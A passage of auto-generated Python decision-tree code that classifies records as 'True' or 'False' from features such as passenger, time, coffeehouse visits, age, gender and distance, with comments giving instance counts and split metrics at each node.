elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.2597, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 7, "metric_value": 0.3429, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.4, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>4:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 0.1875, "depth": 9}
if obj[9]>1.0:
return 'False'
elif obj[9]<=1.0:
# {"feature": "Education", "instances": 4, "metric_value": 0.25, "depth": 10}
if obj[6]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[12]>2:
# {"feature": "Children", "instances": 46, "metric_value": 0.4369, "depth": 8}
if obj[5]<=0:
# {"feature": "Coffeehouse", "instances": 34, "metric_value": 0.4592, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Age", "instances": 20, "metric_value": 0.4768, "depth": 10}
if obj[4]<=2:
# {"feature": "Education", "instances": 11, "metric_value": 0.3818, "depth": 11}
if obj[6]<=3:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[6]>3:
return 'True'
else: return 'True'
elif obj[4]>2:
# {"feature": "Education", "instances": 9, "metric_value": 0.4167, "depth": 11}
if obj[6]<=2:
# {"feature": "Gender", "instances": 8, "metric_value": 0.4667, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[9]>2.0:
# {"feature": "Education", "instances": 14, "metric_value": 0.3297, "depth": 10}
if obj[6]<=2:
# {"feature": "Age", "instances": 13, "metric_value": 0.3231, "depth": 11}
if obj[4]>1:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4167, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
return 'True'
else: return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 12, "metric_value": 0.2, "depth": 9}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
# {"feature": "Age", "instances": 5, "metric_value": 0.3, "depth": 10}
if obj[4]>0:
# {"feature": "Coffeehouse", "instances": 4, "metric_value": 0.25, "depth": 11}
if obj[9]<=2.0:
return 'True'
elif obj[9]>2.0:
# {"feature": "Education", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[6]>2:
return 'True'
elif obj[6]<=2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>14.155999220544217:
# {"feature": "Age", "instances": 33, "metric_value": 0.2458, "depth": 7}
if obj[4]<=2:
# {"feature": "Gender", "instances": 24, "metric_value": 0.1212, "depth": 8}
if obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 22, "metric_value": 0.0808, "depth": 9}
if obj[9]>2.0:
return 'False'
elif obj[9]<=2.0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.1111, "depth": 10}
if obj[12]>1:
return 'False'
elif obj[12]<=1:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=1:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=3:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.0, "depth": 9}
if obj[11]>0:
return 'True'
elif obj[11]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]>2:
# {"feature": "Distance", "instances": 9, "metric_value": 0.2963, "depth": 8}
if obj[12]>1:
# {"feature": "Coffeehouse", "instances": 6, "metric_value": 0.2222, "depth": 9}
if obj[9]>1.0:
return 'True'
elif obj[9]<=1.0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[5]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[12]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>2:
# {"feature": "Age", "instances": 60, "metric_value": 0.4169, "depth": 6}
if obj[4]<=6:
# {"feature": "Coffeehouse", "instances": 59, "metric_value": 0.3999, "depth": 7}
if obj[9]<=2.0:
# {"feature": "Children", "instances": 43, "metric_value": 0.438, "depth": 8}
if obj[5]<=0:
# {"feature": "Occupation", "instances": 35, "metric_value": 0.419, "depth": 9}
if obj[7]<=16:
# {"feature": "Education", "instances": 33, "metric_value": 0.4409, "depth": 10}
if obj[6]<=2:
# {"feature": "Gender", "instances": 31, "metric_value": 0.4363, "depth": 11}
if obj[3]<=0:
# {"feature": "Distance", "instances": 24, "metric_value": 0.4351, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 19, "metric_value": 0.4654, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2381, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[12]<=1:
return 'False'
else: return 'False'
else: return 'True'
elif obj[6]>2:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[7]>16:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.375, "depth": 9}
if obj[3]<=0:
# {"feature": "Occupation", "instances": 6, "metric_value": 0.25, "depth": 10}
if obj[7]<=15:
# {"feature": "Education", "instances": 4, "metric_value": 0.25, "depth": 11}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[11]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[7]>15:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>2.0:
# {"feature": "Education", "instances": 16, "metric_value": 0.1786, "depth": 8}
if obj[6]<=2:
# {"feature": "Occupation", "instances": 14, "metric_value": 0.1143, "depth": 9}
if obj[7]>6:
return 'True'
elif obj[7]<=6:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 9}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[4]>6:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Passanger", "instances": 98, "metric_value": 0.4319, "depth": 5}
if obj[0]<=1:
# {"feature": "Distance", "instances": 90, "metric_value": 0.4178, "depth": 6}
if obj[12]<=1:
# {"feature": "Occupation", "instances": 46, "metric_value": 0.3188, "depth": 7}
if obj[7]>3:
# {"feature": "Gender", "instances": 33, "metric_value": 0.4139, "depth": 8}
if obj[3]<=0:
# {"feature": "Age", "instances": 26, "metric_value": 0.3523, "depth": 9}
if obj[4]<=5:
# {"feature": "Education", "instances": 23, "metric_value": 0.3066, "depth": 10}
if obj[6]<=2:
# {"feature": "Coffeehouse", "instances": 19, "metric_value": 0.2481, "depth": 11}
if obj[9]<=2.0:
# {"feature": "Children", "instances": 14, "metric_value": 0.3214, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.375, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Coffeehouse", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[9]<=2.0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>5:
# {"feature": "Coffeehouse", "instances": 3, "metric_value": 0.0, "depth": 10}
if obj[9]<=1.0:
return 'False'
elif obj[9]>1.0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[3]>0:
# {"feature": "Coffeehouse", "instances": 7, "metric_value": 0.2286, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Age", "instances": 5, "metric_value": 0.0, "depth": 10}
if obj[4]>0:
return 'False'
elif obj[4]<=0:
return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[7]<=3:
return 'True'
else: return 'True'
elif obj[12]>1:
# {"feature": "Occupation", "instances": 44, "metric_value": 0.4325, "depth": 7}
if obj[7]>4:
# {"feature": "Education", "instances": 33, "metric_value": 0.3866, "depth": 8}
if obj[6]>0:
# {"feature": "Coffeehouse", "instances": 23, "metric_value": 0.4551, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Age", "instances": 15, "metric_value": 0.4636, "depth": 10}
if obj[4]>0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.4949, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 9, "metric_value": 0.4921, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4898, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>2.0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.1667, "depth": 10}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
# {"feature": "Age", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[4]>2:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.0, "depth": 9}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]<=4:
# {"feature": "Coffeehouse", "instances": 11, "metric_value": 0.3697, "depth": 8}
if obj[9]>1.0:
# {"feature": "Education", "instances": 6, "metric_value": 0.1667, "depth": 9}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[9]<=1.0:
# {"feature": "Age", "instances": 5, "metric_value": 0.3, "depth": 9}
if obj[4]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[5]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[0]>1:
# {"feature": "Age", "instances": 8, "metric_value": 0.3, "depth": 6}
if obj[4]>0:
# {"feature": "Education", "instances": 5, "metric_value": 0.3, "depth": 7}
if obj[6]>0:
# {"feature": "Occupation", "instances": 4, "metric_value": 0.0, "depth": 8}
if obj[7]>5:
return 'True'
elif obj[7]<=5:
return 'False'
else: return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Education", "instances": 315, "metric_value": 0.417, "depth": 4}
if obj[6]>1:
# {"feature": "Time", "instances": 197, "metric_value": 0.451, "depth": 5}
if obj[1]>0:
# {"feature": "Passanger", "instances": 150, "metric_value": 0.4737, "depth": 6}
if obj[0]<=2:
# {"feature": "Coffeehouse", "instances": 119, "metric_value": 0.462, "depth": 7}
if obj[9]<=3.0:
# {"feature": "Occupation", "instances": 94, "metric_value": 0.4693, "depth": 8}
if obj[7]<=17:
# {"feature": "Age", "instances": 82, "metric_value": 0.4832, "depth": 9}
if obj[4]>0:
# {"feature": "Distance", "instances": 70, "metric_value": 0.4695, "depth": 10}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 43, "metric_value": 0.4213, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 39, "metric_value": 0.4217, "depth": 12}
if obj[5]<=0:
# {"feature": "Gender", "instances": 30, "metric_value": 0.4444, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 9, "metric_value": 0.3444, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Children", "instances": 27, "metric_value": 0.4701, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 26, "metric_value": 0.455, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.4974, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.3967, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]<=0:
# {"feature": "Children", "instances": 12, "metric_value": 0.3704, "depth": 10}
if obj[5]<=0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.381, "depth": 11}
if obj[12]<=2:
# {"feature": "Gender", "instances": 7, "metric_value": 0.4048, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.3333, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]>2:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>17:
# {"feature": "Age", "instances": 12, "metric_value": 0.2222, "depth": 9}
if obj[4]>2:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4, "depth": 10}
if obj[11]<=0:
# {"feature": "Distance", "instances": 5, "metric_value": 0.4, "depth": 11}
if obj[12]<=2:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[3]<=1:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[5]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]>2:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[4]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>3.0:
# {"feature": "Direction_same", "instances": 25, "metric_value": 0.2087, "depth": 8}
if obj[11]<=0:
# {"feature": "Children", "instances": 23, "metric_value": 0.1957, "depth": 9}
if obj[5]<=0:
# {"feature": "Distance", "instances": 12, "metric_value": 0.3429, "depth": 10}
if obj[12]>1:
# {"feature": "Occupation", "instances": 7, "metric_value": 0.1905, "depth": 11}
if obj[7]<=1:
return 'True'
elif obj[7]>1:
# {"feature": "Age", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[4]<=1:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[3]<=0:
return 'True'
else: return 'True'
elif obj[4]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Gender", "instances": 5, "metric_value": 0.4667, "depth": 11}
if obj[3]>0:
# {"feature": "Age", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[4]>1:
# {"feature": "Occupation", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[7]<=16:
return 'True'
else: return 'True'
elif obj[4]<=1:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Age", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[4]<=1:
# {"feature": "Occupation", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[7]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[0]>2:
# {"feature": "Coffeehouse", "instances": 31, "metric_value": 0.2184, "depth": 7}
if obj[9]<=3.0:
# {"feature": "Occupation", "instances": 26, "metric_value": 0.1918, "depth": 8}
if obj[7]<=17:
# {"feature": "Age", "instances": 23, "metric_value": 0.083, "depth": 9}
if obj[4]<=5:
# {"feature": "Gender", "instances": 22, "metric_value": 0.0844, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 14, "metric_value": 0.131, "depth": 11}
if obj[5]<=0:
# {"feature": "Distance", "instances": 12, "metric_value": 0.15, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.18, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[12]<=1:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[4]>5:
return 'False'
else: return 'False'
elif obj[7]>17:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 9}
if obj[3]>0:
# {"feature": "Age", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[4]<=3:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[11]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>3.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Direction_same", "instances": 47, "metric_value": 0.3225, "depth": 6}
if obj[11]<=0:
# {"feature": "Age", "instances": 25, "metric_value": 0.4109, "depth": 7}
if obj[4]>1:
# {"feature": "Occupation", "instances": 14, "metric_value": 0.4167, "depth": 8}
if obj[7]>4:
# {"feature": "Coffeehouse", "instances": 12, "metric_value": 0.4381, "depth": 9}
if obj[9]>1.0:
# {"feature": "Children", "instances": 7, "metric_value": 0.3429, "depth": 10}
if obj[5]<=0:
# {"feature": "Passanger", "instances": 5, "metric_value": 0.4667, "depth": 11}
if obj[0]<=0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[3]>0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[0]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[9]<=1.0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[3]<=0:
# {"feature": "Passanger", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[0]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[0]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=4:
return 'False'
else: return 'False'
elif obj[4]<=1:
# {"feature": "Coffeehouse", "instances": 11, "metric_value": 0.2525, "depth": 8}
if obj[9]>1.0:
# {"feature": "Passanger", "instances": 9, "metric_value": 0.1111, "depth": 9}
if obj[0]>0:
return 'True'
elif obj[0]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[9]<=1.0:
# {"feature": "Passanger", "instances": 2, "metric_value": 0.0, "depth": 9}
if obj[0]<=0:
return 'True'
elif obj[0]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Occupation", "instances": 22, "metric_value": 0.0909, "depth": 7}
if obj[7]<=16:
return 'True'
elif obj[7]>16:
# {"feature": "Age", "instances": 4, "metric_value": 0.3333, "depth": 8}
if obj[4]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 9}
if obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[9]>0.0:
return 'False'
elif obj[9]<=0.0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[4]>2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Occupation", "instances": 118, "metric_value": 0.3338, "depth": 5}
if obj[7]>7:
# {"feature": "Time", "instances": 64, "metric_value": 0.2462, "depth": 6}
if obj[1]<=2:
# {"feature": "Coffeehouse", "instances": 38, "metric_value": 0.1373, "depth": 7}
if obj[9]<=2.0:
# {"feature": "Age", "instances": 23, "metric_value": 0.1581, "depth": 8}
if obj[4]<=6:
# {"feature": "Direction_same", "instances": 22, "metric_value": 0.1212, "depth": 9}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.3333, "depth": 10}
if obj[3]<=0:
# {"feature": "Passanger", "instances": 4, "metric_value": 0.5, "depth": 11}
if obj[0]<=1:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=1:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>6:
return 'False'
else: return 'False'
elif obj[9]>2.0:
return 'True'
else: return 'True'
elif obj[1]>2:
# {"feature": "Passanger", "instances": 26, "metric_value": 0.3401, "depth": 7}
if obj[0]<=2:
# {"feature": "Direction_same", "instances": 19, "metric_value": 0.4145, "depth": 8}
if obj[11]<=0:
# {"feature": "Children", "instances": 16, "metric_value": 0.4219, "depth": 9}
if obj[5]>0:
# {"feature": "Coffeehouse", "instances": 8, "metric_value": 0.3571, "depth": 10}
if obj[9]>0.0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2381, "depth": 11}
if obj[12]<=2:
# {"feature": "Age", "instances": 6, "metric_value": 0.2222, "depth": 12}
if obj[4]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[4]<=0:
return 'False'
else: return 'False'
elif obj[12]>2:
return 'True'
else: return 'True'
elif obj[9]<=0.0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Age", "instances": 8, "metric_value": 0.3333, "depth": 10}
if obj[4]<=6:
# {"feature": "Coffeehouse", "instances": 6, "metric_value": 0.1667, "depth": 11}
if obj[9]>0.0:
return 'True'
elif obj[9]<=0.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>6:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[0]>2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=7:
# {"feature": "Coffeehouse", "instances": 54, "metric_value": 0.3991, "depth": 6}
if obj[9]>0.0:
# {"feature": "Age", "instances": 49, "metric_value": 0.4281, "depth": 7}
if obj[4]<=4:
# {"feature": "Passanger", "instances": 41, "metric_value": 0.3847, "depth": 8}
if obj[0]<=2:
# {"feature": "Time", "instances": 35, "metric_value": 0.4288, "depth": 9}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 18, "metric_value": 0.4575, "depth": 10}
if obj[11]<=0:
# {"feature": "Distance", "instances": 17, "metric_value": 0.4759, "depth": 11}
if obj[12]<=2:
# {"feature": "Gender", "instances": 11, "metric_value": 0.3697, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 5, "metric_value": 0.4667, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[12]>2:
# {"feature": "Gender", "instances": 6, "metric_value": 0.0, "depth": 12}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Distance", "instances": 17, "metric_value": 0.3252, "depth": 10}
if obj[12]<=1:
# {"feature": "Gender", "instances": 9, "metric_value": 0.1778, "depth": 11}
if obj[3]<=0:
